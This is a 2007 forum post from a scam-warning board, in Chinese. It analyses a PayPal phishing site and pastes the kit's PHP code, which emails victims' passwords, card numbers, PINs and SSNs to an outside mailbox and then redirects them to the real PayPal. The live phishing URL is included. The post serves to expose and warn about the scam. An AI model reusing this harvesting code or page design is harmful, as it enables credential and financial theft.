作者boeshan (= =)
看板Bunco
標題Re: [網路]GMail收到的Paypal詐騙信
時間Wed Jul 11 14:47:30 2007
恕刪~
我不是paypal會員 今天也在gmail收到這封詐騙信
來源是日本
網站做的很像paypal登入畫面
下面這是詐騙網站
http://219.42.20.3/icons/cmd/cgi_bin/cmd_login/
Member Log-In那裡 其實亂打帳號密碼就可以進去了
廢話 因為他們要騙你的帳號密碼
server是apache 1.3 目錄瀏覽沒關
我去抓他的php檔案下來看 發現是三個檔案在處理的
分別為 index.php webscr-cmd_personal-run.php 跟 done.php
他很賊 我本來以為他會把user data存入database
看了程式才發現原來是把data寄到一個雅虎信箱
貼上done.php部份程式碼
//sending email info here
$subj = "CC=$card | Exp=$expm/$expy | Cvv=$cvv | Pin=$pin";
$msg = "**************************************************\nUsername:
$user\nPassword:
$password\n**************************************************\nFull Name:
$firstname $lastname\nDate of Birth: $a / $b / $c\nMother Maiden Name:
$mother\nAddress: $address\nCity: $city\nState: $state\nZip: $zip\nHome
Phone:
$night_phone_a-$night_phone_b-$night_phone_c\n**************************************************\nCredit
Card Number: $card\nExpiration Date: $expm / $expy\nCvv: $cvv\nPin:
$pin\nSsn:
$ssn1-$ssn2-$ssn3\n**************************************************\nIP
Address: $ip";
$from = "From: paypal<
[email protected]>";
mail("
[email protected]", $subj, $msg, $from);
header("Location:
https://www.paypal.com/cgi-bin/webscr?cmd=_login-submit&login_email=$user&login_password=$password&cmd=_login-submit");
看到沒 他會把user data (信用卡資料什麼鬼的)寄到
[email protected]
更賊的是他蒐集完你的資料後 會把你導向到paypal的網站
讓你被盜資料後還渾然不知 = =
大家不要在受騙了QQ
--
※ 發信站: 批踢踢實業坊(ptt.cc)
◆ From: 123.240.106.16
1F:推 nataray:可惜現在Yahoo信箱空間無上限,不然就灌爆它 XDDDDD 07/11 15:03